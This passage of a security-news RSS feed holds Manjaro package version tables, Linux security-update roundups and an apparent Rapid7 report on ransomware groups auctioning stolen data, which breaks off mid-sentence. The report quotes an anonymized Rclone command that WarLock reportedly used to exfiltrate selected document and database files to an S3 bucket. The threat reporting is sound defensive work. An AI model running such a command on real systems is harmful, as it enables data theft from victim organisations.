              python-cuda-pathfinder             13.1.1-2            1:1.3.3-1
                      python-debugpy             1.8.19-2             1.8.20-1
                       python-gitlab              7.1.0-2              8.0.0-1
              python-huggingface-hub            1:1.3.4-1            1:1.3.5-1
                        python-janus              1.1.0-4              1.2.0-1
                       python-libvcs             0.37.0-2             0.38.6-1
                   python-numba-cuda             0.24.0-4             0.25.0-1
                         python-path            16.12.0-1            16.12.1-1
                      python-pikepdf             10.2.0-1             10.3.0-1
                   python-playwright             1.57.0-2             1.58.0-1
                        python-pooch              1.8.2-5              1.9.0-1
                     python-pynetbox              7.6.0-1              7.6.1-1
                     python-pytokens              0.4.0-1              0.4.1-1
                       python-pytube             15.0.0-5             15.0.0-6
                   python-rich-click              1.9.5-1              1.9.6-1
                     python-tifffile          2026.1.14-1          2026.1.28-1
                           python-uv             0.9.27-1             0.9.28-1
                     python-uv-build             0.9.27-1             0.9.28-1
                        qalculate-qt              5.9.0-1            5.9.0.1-1
                       qmltermwidget         0.2.0.git1-1         2.0.0.git1-1
                                 qsv             14.0.0-1             15.0.0-1
                               qxmpp             1.13.0-1             1.14.0-1
                              rclone             1.72.1-1             1.73.0-1
                   rebels-in-the-sky              1.5.6-1              1.5.7-1
                                rust           1:1.92.0-1           1:1.93.0-1
                    rust-aarch64-gnu           1:1.92.0-1           1:1.93.0-1
                   rust-aarch64-musl           1:1.92.0-1           1:1.93.0-1
                           rust-musl           1:1.92.0-1           1:1.93.0-1
                            rust-src           1:1.92.0-1           1:1.93.0-1
                           rust-wasm           1:1.92.0-1           1:1.93.0-1
                                 sbt           1:1.12.0-1           1:1.12.1-1
                      signal-desktop             7.86.0-1             7.87.0-1
                                skim             1.11.0-1             1.11.2-1
                         slicer-udev              2.9.4-4              2.9.4-5
                        sof-firmware          2025.12.1-1          2025.12.2-1
                           sof-tools          2025.12.1-1          2025.12.2-1
                             swayosd              0.2.1-2              0.3.0-1
                       systemctl-tui              0.4.1-1              0.5.1-1
                            teamtype              0.9.0-2              0.9.1-1
                            thermald           1:2.5.10-1           2:2.5.11-1
                         timescaledb             2.24.0-1             2.25.0-1
             timescaledb-old-upgrade             2.24.0-1             2.25.0-1
                                 tor           0.4.8.21-1           0.4.8.22-1
                                 usd              25.11-3              25.11-4
                                  uv             0.9.27-1             0.9.28-1
                    vhba-module-dkms          20250329-61          20250329-62
                          virtualbox              7.2.4-2              7.2.6-1
                  virtualbox-ext-vnc              7.2.4-2              7.2.6-1
                virtualbox-guest-iso              7.2.4-1              7.2.6-1
              virtualbox-guest-utils              7.2.4-2              7.2.6-1
          virtualbox-guest-utils-nox              7.2.4-2              7.2.6-1
                virtualbox-host-dkms              7.2.4-2              7.2.6-1
                      virtualbox-sdk              7.2.4-2              7.2.6-1
               vivaldi-ffmpeg-codecs     142.0.7444.267-1     144.0.7559.114-1
                              wasmer              6.1.0-2              7.0.0-1
                              wimlib             1.14.4-2             1.14.5-1
                             wiremix              0.8.0-1              0.9.0-1
                                  wt             4.12.1-3             4.12.2-1
           xdg-desktop-portal-cosmic            1:1.0.3-1            1:1.0.4-1
                              yt-dlp         2025.12.08-2         2026.01.29-1
                          yt-dlp-ejs              0.3.2-2              0.4.0-1
                                 zed            0.220.7-1            0.221.5-1
                              zenith             0.14.1-1             0.14.3-1
                            orc-docs                    -             0.4.42-1
                           wdisplays                    -              1.1.3-1


:: Different overlay package(s) in repository multilib x86_64

-------------------------------------------------------------------------------
                             PACKAGE             20260128             20260131
-------------------------------------------------------------------------------
                lib32-gamescope-plus      3.15.13.plus1-2                    -


:: Different sync package(s) in repository multilib x86_64

-------------------------------------------------------------------------------
                             PACKAGE             20260128             20260131
-------------------------------------------------------------------------------
                          lib32-curl             8.18.0-3             8.18.0-4
                lib32-libcurl-compat             8.18.0-3             8.18.0-4
                lib32-libcurl-gnutls             8.18.0-3             8.18.0-4
                        lib32-libxmu              1.2.1-1              1.3.1-1
                           lib32-orc             0.4.41-1             0.4.42-1
                     lib32-procps-ng              4.0.5-1              4.0.6-1

</code></pre>
<p><a href="https://forum.manjaro.org/t/testing-update-2026-01-31-kernels-firefox-cosmic/185261/1">Click to view the poll.</a></p>
<p>Check if your mirror has already synced:</p>
<ul>
<li><a href="https://repo.manjaro.org/">Mirror-Check Service</a></li>
</ul>
<hr>
            <p><small>2 posts - 2 participants</small></p>
            <p><a href="https://forum.manjaro.org/t/testing-update-2026-01-31-kernels-firefox-cosmic/185261">Read full topic</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Friday]]></title>
<description><![CDATA[Security updates have been issued by AlmaLinux (kernel), Debian (bind9, chromium, osslsigncode, and python-urllib3), Fedora (freerdp, ghostscript, hcloud, rclone, rust-rkyv0.7, rust-rkyv_derive0.7, and vsftpd), Mageia (avahi and harfbuzz), SUSE (alloy, avahi, busybox, cargo-c, corepack22, corepac...]]></description>
<link>https://tsecurity.de/de/3230433/linux-tipps/security-updates-for-friday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3230433/linux-tipps/security-updates-for-friday/</guid>
<pubDate>Fri, 23 Jan 2026 15:07:19 +0100</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>AlmaLinux</b> (kernel), <b>Debian</b> (bind9, chromium, osslsigncode, and python-urllib3), <b>Fedora</b> (freerdp, ghostscript, hcloud, rclone, rust-rkyv0.7, rust-rkyv_derive0.7, and vsftpd), <b>Mageia</b> (avahi and harfbuzz), <b>SUSE</b> (alloy, avahi, busybox, cargo-c, corepack22, corepack24, curl, docker, dpdk, exiv2-0_26, ffmpeg-4, firefox, glib2, go1.24, go1.25, gpg2, haproxy, kernel, kernel-firmware, keylime, libpng16, librsvg, libsodium, libsoup, libsoup2, libtasn1, log4j, net-snmp, open-vm-tools, openldap2_5, ovmf, pgadmin4, php7, podman, python-filelock, python-marshmallow, python-pyasn1, python-tornado, python-urllib3, python-virtualenv, python3, python311-pyasn1, python311-weasyprint, rust1.91, rust1.92, util-linux, webkit2gtk3, and wireshark), and <b>Ubuntu</b> (libxml2 and pyasn1).]]></content:encoded>
</item>
<item>
<title><![CDATA[Zwei Probleme in rclone (Fedora)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/3229477/it-security-nachrichten/zwei-probleme-in-rclone-fedora/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3229477/it-security-nachrichten/zwei-probleme-in-rclone-fedora/</guid>
<pubDate>Fri, 23 Jan 2026 06:50:59 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
</item>
<item>
<title><![CDATA[Security updates for Thursday]]></title>
<description><![CDATA[Security updates have been issued by AlmaLinux (gpsd), Debian (inetutils and modsecurity-crs), Fedora (cpp-httplib, curl, mariadb11.8, mingw-libtasn1, mingw-libxslt, mingw-python3, rclone, and rpki-client), Oracle (gimp, glib2, go-toolset:rhel8, golang, kernel, mariadb-devel:10.3, and thunderbird...]]></description>
<link>https://tsecurity.de/de/3228288/linux-tipps/security-updates-for-thursday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3228288/linux-tipps/security-updates-for-thursday/</guid>
<pubDate>Thu, 22 Jan 2026 15:22:51 +0100</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>AlmaLinux</b> (gpsd), <b>Debian</b> (inetutils and modsecurity-crs), <b>Fedora</b> (cpp-httplib, curl, mariadb11.8, mingw-libtasn1, mingw-libxslt, mingw-python3, rclone, and rpki-client), <b>Oracle</b> (gimp, glib2, go-toolset:rhel8, golang, kernel, mariadb-devel:10.3, and thunderbird), <b>Red Hat</b> (buildah, go-toolset:rhel8, golang, grafana, kernel, kernel-rt, multiple packages, openssl, osbuild-composer, podman, and skopeo), <b>Slackware</b> (bind), <b>SUSE</b> (ffmpeg-4, libsodium, libvirt, net-snmp, open-vm-tools, ovmf, postgresql17, postgresql18, python-FontTools, python-weasyprint, and webkit2gtk3), and <b>Ubuntu</b> (glib2.0 and opencc).]]></content:encoded>
</item>
<item>
<title><![CDATA[Denial of Service in rclone (Fedora)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/3227250/it-security-nachrichten/denial-of-service-in-rclone-fedora/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3227250/it-security-nachrichten/denial-of-service-in-rclone-fedora/</guid>
<pubDate>Thu, 22 Jan 2026 06:50:20 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
</item>
<item>
<title><![CDATA[Security updates for Wednesday]]></title>
<description><![CDATA[Security updates have been issued by Debian (containerd, mako, and xen), Fedora (forgejo, nextcloud, openbao, rclone, restic, and tigervnc), Oracle (firefox, kernel, libtiff, libxml2, and postgresql), SUSE (libecpg6, lightdm-kde-greeter, python-cbor2, python-mistralclient-doc, python315, and pyth...]]></description>
<link>https://tsecurity.de/de/3136226/linux-tipps/security-updates-for-wednesday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3136226/linux-tipps/security-updates-for-wednesday/</guid>
<pubDate>Wed, 03 Dec 2025 15:20:44 +0100</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>Debian</b> (containerd, mako, and xen), <b>Fedora</b> (forgejo, nextcloud, openbao, rclone, restic, and tigervnc), <b>Oracle</b> (firefox, kernel, libtiff, libxml2, and postgresql), <b>SUSE</b> (libecpg6, lightdm-kde-greeter, python-cbor2, python-mistralclient-doc, python315, and python39), and <b>Ubuntu</b> (kdeconnect, linux, linux-aws, linux-realtime, python-django, and unbound).]]></content:encoded>
</item>
<item>
<title><![CDATA[Mehrere Probleme in rclone (Fedora)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/3135189/it-security-nachrichten/mehrere-probleme-in-rclone-fedora/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3135189/it-security-nachrichten/mehrere-probleme-in-rclone-fedora/</guid>
<pubDate>Wed, 03 Dec 2025 07:50:26 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
</item>
<item>
<title><![CDATA[Mehrere Probleme in rclone (Fedora)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/3135185/it-security-nachrichten/mehrere-probleme-in-rclone-fedora/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3135185/it-security-nachrichten/mehrere-probleme-in-rclone-fedora/</guid>
<pubDate>Wed, 03 Dec 2025 07:50:06 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
</item>
<item>
<title><![CDATA[Security updates for Wednesday]]></title>
<description><![CDATA[Security updates have been issued by AlmaLinux (bind, binutils, delve and golang, expat, firefox, haproxy, kernel, libsoup3, libssh, libtiff, openssh, openssl, pam, podman, python-kdcproxy, shadow-utils, squid, thunderbird, vim, xorg-x11-server-Xwayland, and zziplib), Debian (cups-filters, libsdl...]]></description>
<link>https://tsecurity.de/de/3121886/linux-tipps/security-updates-for-wednesday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3121886/linux-tipps/security-updates-for-wednesday/</guid>
<pubDate>Wed, 26 Nov 2025 15:37:09 +0100</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>AlmaLinux</b> (bind, binutils, delve and golang, expat, firefox, haproxy, kernel, libsoup3, libssh, libtiff, openssh, openssl, pam, podman, python-kdcproxy, shadow-utils, squid, thunderbird, vim, xorg-x11-server-Xwayland, and zziplib), <b>Debian</b> (cups-filters, libsdl2, linux-6.1, net-snmp, pdfminer, rails, and tryton-sao), <b>Fedora</b> (chromium, docker-buildkit, docker-buildx, and sudo-rs), <b>Gentoo</b> (librnp), <b>Mageia</b> (webkit2), <b>SUSE</b> (amazon-ssm-agent, buildah, curl, dpdk, fontforge-20251009, kernel, libIex-3_4-33, librnp0, python311, rclone, and sssd), and <b>Ubuntu</b> (linux, linux-aws, linux-aws-6.8, linux-ibm, linux-lowlatency, linux-lowlatency-hwe-6.8, linux-nvidia, linux-nvidia-6.8, linux-nvidia-lowlatency, linux-oracle, linux-aws-6.14, linux-oracle-6.14, linux-aws-fips, linux-fips, linux-gcp-fips, linux-realtime, linux-realtime-6.8, mupdf, openjdk-17, openjdk-8, and openjdk-lts).]]></content:encoded>
</item>
<item>
<title><![CDATA[From Extortion to E-commerce: How Ransomware Groups Turn Breaches into Bidding Wars]]></title>
<description><![CDATA[Ransomware has evolved from simple digital extortion into a structured, profit-driven criminal enterprise. Over time, it has led to the development of a complex ecosystem where stolen data is not only leveraged for ransom, but also sold to the highest bidder. This trend first gained traction in 2...]]></description>
<link>https://tsecurity.de/de/3117490/it-security-nachrichten/from-extortion-to-e-commerce-how-ransomware-groups-turn-breaches-into-bidding-wars/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3117490/it-security-nachrichten/from-extortion-to-e-commerce-how-ransomware-groups-turn-breaches-into-bidding-wars/</guid>
<pubDate>Mon, 24 Nov 2025 16:33:44 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><span>Ransomware has evolved from simple digital extortion into a structured, profit-driven criminal enterprise. Over time, it has led to the development of a complex ecosystem where stolen data is not only leveraged for ransom, but also sold to the highest bidder. This trend first gained traction in 2020 when the Pinchy Spider group, better known as REvil, pioneered the practice of hosting data auctions on the dark web, opening a new chapter in the commercialization of cybercrime.</span></p><p><span>In 2025, contemporary groups such as WarLock and Rhysida have embraced similar tactics, further normalizing data auctions as part of their extortion strategies. By opening additional profit streams and attracting more participants, these actors are amplifying both the frequency and impact of ransomware operations. The rise of data auctions reflects a maturing underground economy, one that mirrors legitimate market behavior, yet drives the continued expansion and professionalization of global ransomware activity.</span></p><h2>Anatomy of victim data auctions </h2><p><span>Most modern ransomware groups employ double extortion tactics, exfiltrating data from a victim’s network before deploying encryption. Afterward, they publicly claim responsibility for the attack and threaten to release the stolen data unless their ransom demand is met. This dual-pressure technique significantly increases the likelihood of payment.</span></p><p><span>In recent years, data-only extortion campaigns, in which actors forgo encryption altogether, have risen sharply. In fact, such incidents doubled in 2025, highlighting how the threat of data exposure alone has become an effective extortion lever. Most ransomware operations, however, continue to use encryption as part of their attack chain.</span></p><p><span>Certain ransomware groups have advanced this strategy by introducing data auctions when ransom negotiations with victims fail. In these cases, threat actors invite potential buyers, such as competitors or other interested parties, to bid on the stolen data, often claiming it will be sold exclusively to a single purchaser. In some instances, groups have been observed selling partial datasets, likely adjusted to a buyer’s specific budget or area of interest, while any unsold data is typically published on dark web leak sites.</span></p><p><span>This process is illustrated in Figure 1, under the assumption that the threat actor adheres to their stated claims. However, in practice, there is no guarantee that the stolen data will remain undisclosed, even if the ransom is paid. This highlights the inherent unreliability of negotiating with cybercriminals.</span></p><p>⠀</p><figure><div><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltf34ddf7167c8a7bf/69246a5fb054896d6a03d693/extortion-ecommerce-diagram_(1).jpg" height="438" alt="ransomware-extortion-ecommerce-diagram" caption="Figure 1 - Victim data auctioning process" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="ransomware-extortion-ecommerce-diagram" width="718" max-width="718" max-height="438" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltf34ddf7167c8a7bf/69246a5fb054896d6a03d693/extortion-ecommerce-diagram_(1).jpg" data-sys-asset-uid="bltf34ddf7167c8a7bf" data-sys-asset-filename="extortion-ecommerce-diagram_(1).jpg" data-sys-asset-contenttype="image/jpeg" data-sys-asset-caption="Figure 1 - Victim data auctioning process" data-sys-asset-alt="ransomware-extortion-ecommerce-diagram" data-sys-asset-position="none" sys-style-type="display"><figcaption>Figure 1 - Victim data auctioning process</figcaption></div></figure><p>⠀</p><p><span>This auction model provides an additional revenue stream, enabling ransomware groups to profit from exfiltrated data even when victims refuse to pay. It should be noted, however, that such auctions are often reserved for high-profile incidents. In these cases, the threat actors exploit the publicity surrounding attacks on prominent organizations to draw attention, attract potential buyers, and justify higher starting bids.</span></p><p>This trend is likely driven by the fragmentation of the ransomware ecosystem following the recent disruption of prominent threat actors, including 8Base and BlackSuit. This shift in cybercrime dynamics is compelling smaller, more agile groups to aggressively compete for visibility and profit through auctions and private sales to maintain financial viability. The emergence of the Crimson Collective in October 2025 exemplified this dynamic when the group auctioned stolen datasets to the highest bidder. Although short-lived, this incident served as a proof of concept (PoC) for the growing viability of monetizing data exfiltration independently of traditional ransom schemes.</p><h2>Threat actor spotlight</h2><h3>WarLock</h3><p><span>The WarLock ransomware group has been active since at least June 2025. The group targets organizations across North America, Europe, Asia, and Africa, spanning sectors from technology to critical infrastructure. Since its emergence, WarLock has rapidly gained prominence for its repeated exploitation of vulnerable Microsoft SharePoint servers, leveraging newly disclosed vulnerabilities to gain initial access to targeted systems.</span></p><p><span>The group adopts double extortion tactics, exfiltrating data from the victim’s systems before deploying its ransomware variant. From a recent incident Rapid7 responded to, we observed the threat actor exfiltrating the data from a victim to an S3 bucket using the tool Rclone. An anonymized version of the command used by the threat actor can be found below:</span></p><p><span><span data-type="inlineCode"><em>Rclone.exe copy \\localdirectory :s3 -P --include "*.{pdf,ai,dwg,dxf,dwt,doc,docx,dwg,dwt,dws,shx,pat,lin,ctb,dxf,dwf,step,stl,dst,dxb,,stp,ipt,prt,iges,obj,xlsx,mdf,sql,doc,xls,sql,bak,sqlite,db,sqlite3,sdf,ndf,ldf,csv,mdf,dbf,ibd,myd,ppt,pptx}" -q --ignore-existing --auto-confirm --multi-thread-streams 11 --transfers 11 --max-age 500d --max-size 2000m</em></span></span></p><p><span>WarLock operates a dedicated leak site (DLS) on the dark web, where it lists its victims. From the outset of its operations, the group has auctioned stolen data, publishing only the unsold information online (Figure 2). The group further mentions that the exfiltrated data may be sold to third parties if the victim refuses to pay in their ransom note (Figure 3).</span></p><p>⠀</p><figure><div><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltebb5c7f143bce7b9/69246f2daf699d40dbe18506/2-ransomware-purchased-data.png" alt="2-ransomware-purchased-data.png" caption="Figure 2 - Example of purchased data" height="275" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="2-ransomware-purchased-data.png" width="721" max-width="721" max-height="275" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltebb5c7f143bce7b9/69246f2daf699d40dbe18506/2-ransomware-purchased-data.png" data-sys-asset-uid="bltebb5c7f143bce7b9" data-sys-asset-filename="2-ransomware-purchased-data.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 2 - Example of purchased data" data-sys-asset-alt="2-ransomware-purchased-data.png" data-sys-asset-position="none" sys-style-type="display"><figcaption>Figure 2 - Example of purchased data</figcaption></div></figure><p>⠀</p><figure><div><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltd3698baa8af09fb5/69246f2d2bfe5b6d5e3ef526/3-warlock-ransomware-ransom-note.png" alt="3-warlock-ransomware-ransom-note.png" caption="Figure 3 - WarLock ransom note" height="164" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="3-warlock-ransomware-ransom-note.png" width="723" max-width="723" max-height="164" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltd3698baa8af09fb5/69246f2d2bfe5b6d5e3ef526/3-warlock-ransomware-ransom-note.png" data-sys-asset-uid="bltd3698baa8af09fb5" data-sys-asset-filename="3-warlock-ransomware-ransom-note.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 3 - WarLock ransom note" data-sys-asset-alt="3-warlock-ransomware-ransom-note.png" data-sys-asset-position="none" sys-style-type="display"><figcaption>Figure 3 - WarLock ransom note</figcaption></div></figure><p>⠀</p><p><span>Although WarLock shares updates on the progress and results of these auctions through its DLS, it also relies heavily on its presence on the RAMP4 cybercrime forum to attract potential buyers (Figure 4). This approach likely allows WarLock to reach a wider buyer base by publishing these posts under the relevant thread “Auction \ 拍卖会”. It should be noted that WarLock is assessed to be of Chinese origin, which is further supported by the Chinese-language reference in this thread title.</span></p><p>⠀</p><figure><div><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltb1f7bd7be0fa6797/69246f2dd72d26596aafbeca/4-ransomware-auction-warlock.png" height="403" alt="4-ransomware-auction-warlock.png" caption="Figure 4 - Mention of an auction on WarLock’s DLS" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="4-ransomware-auction-warlock.png" width="727" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltb1f7bd7be0fa6797/69246f2dd72d26596aafbeca/4-ransomware-auction-warlock.png" data-sys-asset-uid="bltb1f7bd7be0fa6797" data-sys-asset-filename="4-ransomware-auction-warlock.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 4 - Mention of an auction on WarLock’s DLS" data-sys-asset-alt="4-ransomware-auction-warlock.png" data-sys-asset-position="none" sys-style-type="display"><figcaption>Figure 4 - Mention of an auction on WarLock’s DLS</figcaption></div></figure><p>⠀</p><p><span>Using the alias “cnkjasdfgd,” the group advertises details about the nature and volume of exfiltrated data, along with sample files (Figure 5). WarLock further directs interested buyers to its Tox account, a peer-to-peer encrypted messaging and video-calling platform, where the auctions appear to take place.</span></p><p>⠀</p><figure><div><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt42b22e609334b7a0/69246f2e2b28371f24b49a8d/5-warlock-ramp4.png" height="359" alt="5-warlock-ramp4.png" caption="Figure 5 - WarLock’s post on RAMP4" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="5-warlock-ramp4.png" width="730" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt42b22e609334b7a0/69246f2e2b28371f24b49a8d/5-warlock-ramp4.png" data-sys-asset-uid="blt42b22e609334b7a0" data-sys-asset-filename="5-warlock-ramp4.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 5 - WarLock’s post on RAMP4" data-sys-asset-alt="5-warlock-ramp4.png" data-sys-asset-position="none" sys-style-type="display"><figcaption>Figure 5 - WarLock’s post on RAMP4</figcaption></div></figure><p>⠀</p><p><span>This approach appears to be highly effective for WarLock. Despite being a recent entrant to the ransomware ecosystem, the group has reportedly sold victim data in approximately 55% of its claimed attacks, accounting for 55 victims to date as of November 2025, demonstrating significant traction within underground markets. The remaining victims’ data has been publicly released on the group’s DLS, following unsuccessful ransom negotiations and a lack of interested buyers.</span></p><h3>Rhysida</h3><p><span>The Rhysida ransomware group was first identified by cybersecurity researchers in May 2023. The group primarily targets Windows operating systems across both public and private organizations in sectors such as government, defense, education, and manufacturing. Its operations have been observed in several countries, including the United Kingdom, Switzerland, Australia, and Chile. The threat actors portray themselves as a so-called “cybersecurity team” that assists organizations in securing their networks by exposing system vulnerabilities.</span></p><p><span>Rhysida maintains an active DLS, where it publishes data belonging to victims who refuse to pay the ransom, in alignment with double extortion tactics. Since at least June 2023, the group has also conducted data auctions via a dedicated “Auctions Online” section of its DLS. These auctions typically run for seven days, and Rhysida claims that each dataset is sold exclusively to a single buyer. As of mid-October 2025, the group was hosting five ongoing auctions, with starting prices ranging from 5 to 10 Bitcoin (Figure 6).</span></p><p>⠀</p><figure><div><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltbff44f7770ccf830/69246f2d25f1f4fc723c0b8c/6-ransomware-auction-rhysida-dls.png" alt="6-ransomware-auction-rhysida-dls.png" caption="Figure 6 - Example of an auction on Rhysida’s DLS" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="6-ransomware-auction-rhysida-dls.png" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltbff44f7770ccf830/69246f2d25f1f4fc723c0b8c/6-ransomware-auction-rhysida-dls.png" data-sys-asset-uid="bltbff44f7770ccf830" data-sys-asset-filename="6-ransomware-auction-rhysida-dls.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 6 - Example of an auction on Rhysida’s DLS" data-sys-asset-alt="6-ransomware-auction-rhysida-dls.png" data-sys-asset-position="none" sys-style-type="display"><figcaption>Figure 6 - Example of an auction on Rhysida’s DLS</figcaption></div></figure><p>⠀</p><p><span>Once the auction period ends, Rhysida publicly releases any unsold data on its DLS (Figure 7). Instead, if the auction is successful, the data is marked as “sold”, without being released on the group’s DLS (Figure 8). In many cases, the group publishes only a subset of the stolen data, often accompanied by the note “not sold data was published” (Figure 9).</span></p><p>⠀</p><figure><div><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt769705e9285f0e07/69246f2eb05489c43e03d6f7/7-data-release-ransomware-rhysida.png" height="459" alt="7-data-release-ransomware-rhysida.png" caption="Figure 7 - Example of full data release on Rhysida’s DLS " class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="7-data-release-ransomware-rhysida.png" width="712" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt769705e9285f0e07/69246f2eb05489c43e03d6f7/7-data-release-ransomware-rhysida.png" data-sys-asset-uid="blt769705e9285f0e07" data-sys-asset-filename="7-data-release-ransomware-rhysida.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 7 - Example of full data release on Rhysida’s DLS" data-sys-asset-alt="7-data-release-ransomware-rhysida.png" data-sys-asset-position="none" sys-style-type="display"><figcaption>Figure 7 - Example of full data release on Rhysida’s DLS</figcaption></div></figure><p>⠀</p><figure><div><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt9214ab94a22a4565/69246f2e33936a027ee5d854/8-sold-data-rhysida.png" height="189" alt="8-sold-data-rhysida.png" caption="Figure 8 - Example of sold data on Rhysida’s DLS" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="8-sold-data-rhysida.png" width="714" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt9214ab94a22a4565/69246f2e33936a027ee5d854/8-sold-data-rhysida.png" data-sys-asset-uid="blt9214ab94a22a4565" data-sys-asset-filename="8-sold-data-rhysida.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 8 - Example of sold data on Rhysida’s DLS" data-sys-asset-alt="8-sold-data-rhysida.png" data-sys-asset-position="none" sys-style-type="display"><figcaption>Figure 8 - Example of sold data on Rhysida’s DLS</figcaption></div></figure><p>⠀</p><figure><div><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltfb93b2360fc19c6a/69247387c3599f720c8f8cb1/9-partial-data-release-rhysida-ransomware.png" height="186" alt="9-partial-data-release-rhysida-ransomware.png" caption="Figure 9 - Example of partial data release on Rhysida’s DLS" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="9-partial-data-release-rhysida-ransomware.png" width="719" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltfb93b2360fc19c6a/69247387c3599f720c8f8cb1/9-partial-data-release-rhysida-ransomware.png" data-sys-asset-uid="bltfb93b2360fc19c6a" data-sys-asset-filename="9-partial-data-release-rhysida-ransomware.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 9 - Example of partial data release on Rhysida’s DLS" data-sys-asset-alt="9-partial-data-release-rhysida-ransomware.png" data-sys-asset-position="none" sys-style-type="display"><figcaption>Figure 9 - Example of partial data release on Rhysida’s DLS</figcaption></div></figure><p>⠀</p><p><span>With 224 claimed attacks to date as of November 2025, approximately 67% resulting in full or partial data sales, auctions represent a significant additional revenue stream for Rhysida. The group’s auction model appears to be considerably more effective than WarLock’s (Figure 10), likely due to Rhysida’s established reputation within the cybercrime ecosystem and its involvement in several high-profile attacks.</span></p><p>⠀</p><figure><div><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltc0823c731dd9b817/69246f2e179d4339f532d78d/10-ransomware-auction-outcomes-graph-chart.png" height="446" alt="10-ransomware-auction-outcomes-graph-chart.png" caption="Figure 10 -  Overview of auction outcomes" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="10-ransomware-auction-outcomes-graph-chart.png" width="721" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltc0823c731dd9b817/69246f2e179d4339f532d78d/10-ransomware-auction-outcomes-graph-chart.png" data-sys-asset-uid="bltc0823c731dd9b817" data-sys-asset-filename="10-ransomware-auction-outcomes-graph-chart.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 10 -  Overview of auction outcomes" data-sys-asset-alt="10-ransomware-auction-outcomes-graph-chart.png" data-sys-asset-position="none" sys-style-type="display"><figcaption>Figure 10 -  Overview of auction outcomes</figcaption></div></figure><h2>Conclusion</h2><p>The cyber extortion ecosystem is undergoing a profound transformation, shifting from traditional ransom payments to a diversified, market-driven model centered on data auctions and direct sales. This evolution marks a turning point in how ransomware groups generate revenue, transforming what were once isolated extortion incidents into structured commercial transactions.</p><p>Groups such as WarLock and Rhysida exemplify this shift, illustrating how ransomware operations increasingly mirror illicit e-commerce ecosystems. By auctioning exfiltrated data, these actors not only create additional revenue streams but also reduce their dependence on ransom compliance, monetizing stolen data even when victims refuse to pay. This approach has proven particularly lucrative for these threat actors, likely setting a precedent for newer extortion groups eager to replicate their success.</p><p>As a result, proprietary and sensitive data, including personally identifiable and financial information, is flooding dark web marketplaces at an unprecedented pace. This expanding secondary market intensifies both the operational and reputational risks faced by affected organizations, extending the impact of an 